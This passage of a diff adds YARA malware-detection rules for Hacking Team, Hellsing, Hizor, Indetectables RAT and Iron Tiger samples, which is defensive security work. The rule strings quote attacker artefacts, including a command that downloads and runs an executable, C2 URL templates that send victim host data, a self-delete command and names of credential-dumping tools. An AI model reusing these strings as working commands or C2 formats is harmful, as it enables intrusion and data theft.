+		hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051"
+		hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0"
+		hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb"
+	strings:
+		$s1 = "cmd.exe /c %s > %s" fullword ascii
+		$s2 = "execute cmd timeout." fullword ascii
+		$s3 = "rundll32.exe \"%s\",Setting" fullword ascii
+		$s4 = "DownloadFile - exception:%s." fullword ascii
+		$s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii
+		$s6 = "UploadFile - EncryptBuffer Error" fullword ascii
+		$s7 = "WinDLL.dll" fullword wide
+		$s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii
+		$s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 250KB and 3 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_HackingTeam.yar remnux-rules-0.0.4/yara/malware/APT_HackingTeam.yar
--- remnux-rules-0.0.3/yara/malware/APT_HackingTeam.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_HackingTeam.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,72 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule bin_ndisk {
+	meta:
+		description = "Hacking Team Disclosure Sample - file ndisk.sys"
+		author = "Florian Roth"
+		reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
+		date = "2015-07-07"
+		hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
+	strings:
+		$s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide 
+		$s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide 
+		$s3 = "\\Driver\\DeepFrz" fullword wide
+		$s4 = "Microsoft Kernel Disk Manager" fullword wide 
+		$s5 = "ndisk.sys" fullword wide
+		$s6 = "\\Device\\MSH4DEV1" fullword wide
+		$s7 = "\\DosDevices\\MSH4DEV1" fullword wide
+		$s8 = "built by: WinDDK" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 30KB and 6 of them
+}
+
+rule Hackingteam_Elevator_DLL {
+	meta:
+		description = "Hacking Team Disclosure Sample - file elevator.dll"
+		author = "Florian Roth"
+		reference = "http://t.co/EG0qtVcKLh"
+		date = "2015-07-07"
+		hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
+	strings:
+		$s1 = "\\sysnative\\CI.dll" fullword ascii 
+		$s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii 
+		$s3 = "mitmproxy0" fullword ascii 
+		$s4 = "\\insert_cert.exe" fullword ascii
+		$s5 = "elevator.dll" fullword ascii
+		$s6 = "CRTDLL.DLL" fullword ascii
+		$s7 = "fail adding cert" fullword ascii
+		$s8 = "DownloadingFile" fullword ascii 
+		$s9 = "fail adding cert: %s" fullword ascii
+		$s10 = "InternetOpenA fail" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and 6 of them
+}
+
+rule HackingTeam_Elevator_EXE {
+	meta:
+		description = "Hacking Team Disclosure Sample - file elevator.exe"
+		author = "Florian Roth"
+		reference = "Hacking Team Disclosure elevator.c"
+		date = "2015-07-07"
+		hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
+		hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
+		hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
+	strings:
+		$x1 = "CRTDLL.DLL" fullword ascii
+		$x2 = "\\sysnative\\CI.dll" fullword ascii
+		$x3 = "\\SystemRoot\\system32\\CI.dll" fullword ascii
+		$x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii /* PEStudio Blacklist: strings */
+
+		$s1 = "[*] traversing processes" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "_getkprocess" fullword ascii /* PEStudio Blacklist: strings */
+		$s3 = "[*] LoaderConfig %p" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "loader.obj" fullword ascii /* PEStudio Blacklist: strings */
+		$s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii /* PEStudio Blacklist: strings */
+		$s6 = "[*] token restore" fullword ascii /* PEStudio Blacklist: strings */
+		$s7 = "elevator.obj" fullword ascii
+		$s8 = "_getexport" fullword ascii /* PEStudio Blacklist: strings */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 3000KB and all of ($x*) and 3 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Hellsing.yar remnux-rules-0.0.4/yara/malware/APT_Hellsing.yar
--- remnux-rules-0.0.3/yara/malware/APT_Hellsing.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Hellsing.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,158 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+import "pe"
+
+
+rule apt_hellsing_implantstrings : PE
+{ 
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+
+		$a1="the file uploaded failed !" 
+		$a2="ping 127.0.0.1"
+		
+		$b1="the file downloaded failed !" 
+		$b2="common.asp"
+		
+		$c="xweber_server.exe" 
+		$d="action="
+
+		$debugpath1="d:\\Hellsing\\release\\msger\\" nocase 
+		$debugpath2="d:\\hellsing\\sys\\xrat\\" nocase 
+		$debugpath3="D:\\Hellsing\\release\\exe\\" nocase 
+		$debugpath4="d:\\hellsing\\sys\\xkat\\" nocase 
+		$debugpath5="e:\\Hellsing\\release\\clare" nocase 
+		$debugpath6="e:\\Hellsing\\release\\irene\\" nocase 
+		$debugpath7="d:\\hellsing\\sys\\irene\\" nocase
+
+		$e="msger_server.dll"
+		$f="ServiceMain"
+
+	condition:
+		($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
+}
+
+rule apt_hellsing_installer : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xweber/msger installers"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		
+		$cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+		
+		$a1="xweber_install_uac.exe"
+		$a2="system32\\cmd.exe" wide
+		$a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" 
+		$a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+		$a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" 
+		$a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide 
+		$a10="%SystemRoot%\\system32\\cmd.exe" wide 
+		$a11="msger_install.dll"
+		$a12={00 65 78 2E 64 6C 6C 00}
+
+	condition:
+		($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
+}
+
+rule apt_hellsing_proxytool : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing proxy testing tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		$a1="PROXY_INFO: automatic proxy url => %s " 
+		$a2="PROXY_INFO: connection type => %d " 
+		$a3="PROXY_INFO: proxy server => %s " 
+		$a4="PROXY_INFO: bypass list => %s " 
+		$a5="InternetQueryOption failed with GetLastError() %d" 
+		$a6="D:\\Hellsing\\release\\exe\\exe\\" nocase
+
+	condition:
+		($mz at 0) and (2 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_xkat : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xKat tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="\\Dbgv.sys"
+		$a2="XKAT_BIN"
+		$a3="release sys file error."
+		$a4="driver_load error. "
+		$a5="driver_create error."
+		$a6="delete file:%s error."
+		$a7="delete file:%s ok."
+		$a8="kill pid:%d error."
+		$a9="kill pid:%d ok."
+		$a10="-pid-delete"
+		$a11="kill and delete pid:%d error."
+		$a12="kill and delete pid:%d ok."
+
+	condition:
+		($mz at 0) and (6 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_msgertype2 : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger type 2 implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="%s\\system\\%d.txt"
+		$a2="_msger"
+		$a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+		$a4="http://%s/data/%s.1000001000"
+		$a5="/lib/common.asp?action=user_upload&file="
+		$a6="%02X-%02X-%02X-%02X-%02X-%02X"
+	
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
+
+rule apt_hellsing_irene : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger irene installer"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+		$a1="\\Drivers\\usbmgr.tmp" wide
+		$a2="\\Drivers\\usbmgr.sys" wide
+		$a3="common_loadDriver CreateFile error! " 
+		$a4="common_loadDriver StartService error && GetLastError():%d! " 
+		$a5="irene" wide
+		$a6="aPLib v0.43 - the smaller the better" 
+
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Hikit.yar remnux-rules-0.0.4/yara/malware/APT_Hikit.yar
--- remnux-rules-0.0.3/yara/malware/APT_Hikit.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Hikit.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_Hikit_msrv
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C}
+condition:
+	any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Hizor_RAT.yar remnux-rules-0.0.4/yara/malware/APT_Hizor_RAT.yar
--- remnux-rules-0.0.3/yara/malware/APT_Hizor_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Hizor_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,32 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule apt_win32_dll_rat_hiZor_RAT
+{
+	meta:
+    description = "Detects hiZor RAT"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+    ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
+    ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar"
+    reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+	strings:
+		// Part of the encoded User-Agent = Mozilla
+		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
+
+		// XOR to decode User-Agent after string stacking 0x10001630
+		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
+
+		// XOR with 0x2E - 0x10002EF6
+		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
+
+		$s4 = "CmdProcessExited" wide ascii
+		$s5 = "rootDir" wide ascii
+		$s6 = "DllRegisterServer" wide ascii
+		$s7 = "GetNativeSystemInfo" wide ascii
+		$s8 = "%08x%08x%08x%08x" wide ascii
+	condition:
+		(uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_indetectables_RAT.yar remnux-rules-0.0.4/yara/malware/APT_indetectables_RAT.yar
--- remnux-rules-0.0.3/yara/malware/APT_indetectables_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_indetectables_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,56 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-10-01
+	Identifier: Indetectables RAT
+*/
+
+rule Indetectables_RAT {
+	meta:
+		description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
+		author = "Florian Roth"
+		reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
+		date = "2015-10-01"
+		super_rule = 1
+		hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
+		hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
+		hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
+	strings:
+		$s1 = "Coded By M3" fullword wide
+		$s2 = "Stub Undetector M3" fullword wide
+		$s3 = "www.webmenegatti.com.br" wide
+		$s4 = "M3n3gatt1" fullword wide
+		$s5 = "TheMisterFUD" fullword wide
+		$s6 = "KillZoneKillZoneKill" fullword ascii
+		$s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
+		$s8 = "M3_F_U_D_M3" ascii
+		$s9 = "M3n3gatt1hack3r" fullword wide
+		$s9a = "M3n3gatt1hack3r" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them
+}
+
+rule BergSilva_Malware {
+	meta:
+		description = "Detects a malware from the same author as the Indetectables RAT"
+		author = "Florian Roth"
+		date = "2015-10-01"
+		super_rule = 1
+		hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
+		hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
+	strings:
+		$x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
+		$x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
+
+		$s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
+		$s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
+		$s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
+		$s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
+		$s5 = "https://dl.dropbox.com/u/105015858" wide
+	condition:
+		uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Irontiger_Trendmicro.yar remnux-rules-0.0.4/yara/malware/APT_Irontiger_Trendmicro.yar
--- remnux-rules-0.0.3/yara/malware/APT_Irontiger_Trendmicro.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Irontiger_Trendmicro.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,307 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule IronTiger_ASPXSpy
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "ASPXSpy detection. It might be used by other fraudsters"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "ASPXSpy" nocase wide ascii
+		$str2 = "IIS Spy" nocase wide ascii
+		$str3 = "protected void DGCoW(object sender,EventArgs e)" nocase wide ascii
+	condition:
+		any of ($str*)
+}
+
+rule IronTiger_ChangePort_Toolkit_driversinstall
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - Changeport Toolkit driverinstall"	
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "openmydoor" nocase wide ascii
+		$str2 = "Install service error" nocase wide ascii
+		$str3 = "start remove service" nocase wide ascii
+		$str4 = "NdisVersion" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (2 of ($str*))
+}
+
+rule IronTiger_ChangePort_Toolkit_ChangePortExe
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - Toolkit ChangePort"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Unable to alloc the adapter!" nocase wide ascii
+		$str2 = "Wait for master fuck" nocase wide ascii
+		$str3 = "xx.exe <HOST> <PORT>" nocase wide ascii
+		$str4 = "chkroot2007" nocase wide ascii
+		$str5 = "Door is bind on %s" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (2 of ($str*))
+}
+
+rule IronTiger_dllshellexc2010
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "dllshellexc2010 Exchange backdoor + remote shell"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Microsoft.Exchange.Clients.Auth.dll" nocase ascii wide
+		$str2 = "Dllshellexc2010" nocase wide ascii
+		$str3 = "Users\\ljw\\Documents" nocase wide ascii
+		$bla1 = "please input path" nocase wide ascii
+		$bla2 = "auth.owa" nocase wide ascii
+	condition:
+		(uint16(0) == 0x5a4d) and ((any of ($str*)) or (all of ($bla*)))
+}
+
+rule IronTiger_dnstunnel
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "This rule detects a dns tunnel tool used in Operation Iron Tiger"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "\\DnsTunClient\\" nocase wide ascii
+		$str2 = "\\t-DNSTunnel\\" nocase wide ascii
+		$str3 = "xssok.blogspot" nocase wide ascii
+		$str4 = "dnstunclient" nocase wide ascii
+		$mistake1 = "because of error, can not analysis" nocase wide ascii
+		$mistake2 = "can not deal witn the error" nocase wide ascii
+		$mistake3 = "the other retun one RST" nocase wide ascii
+		$mistake4 = "Coversation produce one error" nocase wide ascii
+		$mistake5 = "Program try to use the have deleted the buffer" nocase wide ascii
+	condition:
+		(uint16(0) == 0x5a4d) and ((any of ($str*)) or (any of ($mistake*)))
+}
+
+rule IronTiger_EFH3_encoder
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger EFH3 Encoder"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" nocase wide ascii
+		$str2 = "123.EXE 123.EFH" nocase wide ascii
+		$str3 = "ENCODER: b[i]: = " nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (any of ($str*))
+}
+
+rule IronTiger_GetPassword_x64
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - GetPassword x64"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "(LUID ERROR)" nocase wide ascii
+		$str2 = "Users\\K8team\\Desktop\\GetPassword" nocase wide ascii
+		$str3 = "Debug x64\\GetPassword.pdb" nocase wide ascii
+		$bla1 = "Authentication Package:" nocase wide ascii
+		$bla2 = "Authentication Domain:" nocase wide ascii
+		$bla3 = "* Password:" nocase wide ascii
+		$bla4 = "Primary User:" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*)))
+}
+
+rule IronTiger_GetUserInfo
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - GetUserInfo"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "getuserinfo username" nocase wide ascii
+		$str2 = "joe@joeware.net" nocase wide ascii
+		$str3 = "If . specified for userid," nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (any of ($str*))
+}
+
+rule IronTiger_Gh0stRAT_variant
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "This is a detection for a s.exe variant seen in Op. Iron Tiger"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Game Over Good Luck By Wind" nocase wide ascii
+		$str2 = "ReleiceName" nocase wide ascii
+		$str3 = "jingtisanmenxiachuanxiao.vbs" nocase wide ascii
+		$str4 = "Winds Update" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (any of ($str*))
+}
+
+rule IronTiger_GTalk_Trojan
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - GTalk Trojan"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "gtalklite.com" nocase wide ascii
+		$str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" nocase wide ascii
+		$str3 = "D13idmAdm" nocase wide ascii
+		$str4 = "Error: PeekNamedPipe failed with %i" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (2 of ($str*))
+}
+
+rule IronTiger_HTTPBrowser_Dropper
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - HTTPBrowser Dropper"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = ".dllUT" nocase wide ascii
+		$str2 = ".exeUT" nocase wide ascii
+		$str3 = ".urlUT" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (2 of ($str*))
+}
+
+rule IronTiger_HTTP_SOCKS_Proxy_soexe
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "listen SOCKET error." nocase wide ascii
+		$str2 = "WSAAsyncSelect SOCKET error." nocase wide ascii
+		$str3 = "new SOCKETINFO error!" nocase wide ascii
+		$str4 = "Http/1.1 403 Forbidden" nocase wide ascii
+		$str5 = "Create SOCKET error." nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (3 of ($str*))
+}
+
+rule IronTiger_NBDDos_Gh0stvariant_dropper
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "This service can't be stoped." nocase wide ascii
+		$str2 = "Provides support for media palyer" nocase wide ascii
+		$str4 = "CreaetProcess Error" nocase wide ascii
+		$bla1 = "Kill You" nocase wide ascii
+		$bla2 = "%4.2f GB" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*)))
+}
+
+rule IronTiger_PlugX_DosEmulator
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - PlugX DosEmulator"	
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Dos Emluator Ver" nocase wide ascii
+		$str2 = "\\PIPE\\FASTDOS" nocase wide ascii
+		$str3 = "FastDos.cpp" nocase wide ascii
+		$str4 = "fail,error code = %d." nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (any of ($str*))
+}
+
+rule IronTiger_PlugX_FastProxy
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - PlugX FastProxy"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "SAFEPROXY HTServerTimer Quit!" nocase wide ascii
+		$str2 = "Useage: %s pid" nocase wide ascii
+		$str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" nocase wide ascii
+		$str4 = "p0: port for listener" nocase wide ascii
+		$str5 = "\\users\\whg\\desktop\\plug\\" nocase wide ascii
+		$str6 = "[+Y] cwnd : %3d, fligth:" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (any of ($str*))
+}
+
+rule IronTiger_PlugX_Server
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - PlugX Server"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "\\UnitFrmManagerKeyLog.pas" nocase wide ascii
+		$str2 = "\\UnitFrmManagerRegister.pas" nocase wide ascii
+		$str3 = "Input Name..." nocase wide ascii
+		$str4 = "New Value#" nocase wide ascii
+		$str5 = "TThreadRControl.Execute SEH!!!" nocase wide ascii
+		$str6 = "\\UnitFrmRControl.pas" nocase wide ascii
+		$str7 = "OnSocket(event is error)!" nocase wide ascii
+		$str8 = "Make 3F Version Ok!!!" nocase wide ascii
+		$str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" nocase wide ascii
+		$str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (2 of ($str*))
+}
+
+rule IronTiger_ReadPWD86
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - ReadPWD86"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Fail To Load LSASRV" nocase wide ascii
+		$str2 = "Fail To Search LSASS Data" nocase wide ascii
+		$str3 = "User Principal" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and (all of ($str*))
+}
+
+rule IronTiger_Ring_Gh0stvariant
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Malware - Ring Gh0stvariant"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "RING RAT Exception" nocase wide ascii
+		$str2 = "(can not update server recently)!" nocase wide ascii
+		$str4 = "CreaetProcess Error" nocase wide ascii
+		$bla1 = "Sucess!" nocase wide ascii
+		$bla2 = "user canceled!" nocase wide ascii
+	condition:
+		uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*)))
+}
+
+rule IronTiger_wmiexec
+{
+	meta:
+		author = "Cyber Safety Solutions, Trend Micro"
+		description = "Iron Tiger Tool - wmi.vbs detection"
+		reference = "http://goo.gl/T5fSJC"
+	strings:
+		$str1 = "Temp Result File , Change it to where you like" nocase wide ascii
+		$str2 = "wmiexec" nocase wide ascii
+		$str3 = "By. Twi1ight" nocase wide ascii
+		$str4 = "[both mode] ,delay TIME to read result" nocase wide ascii
+		$str5 = "such as nc.exe or Trojan" nocase wide ascii
+		$str6 = "+++shell mode+++" nocase wide ascii
+		$str7 = "win2008 fso has no privilege to delete file" nocase wide ascii
+	condition:
+		2 of ($str*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_irontiger.yar remnux-rules-0.0.4/yara/malware/APT_irontiger.yar
--- remnux-rules-0.0.3/yara/malware/APT_irontiger.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_irontiger.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,150 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-09-16
+	Identifier: Iron Panda
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule IronPanda_DNSTunClient {
+	meta:
+		description = "Iron Panda malware DnsTunClient - file named.exe"
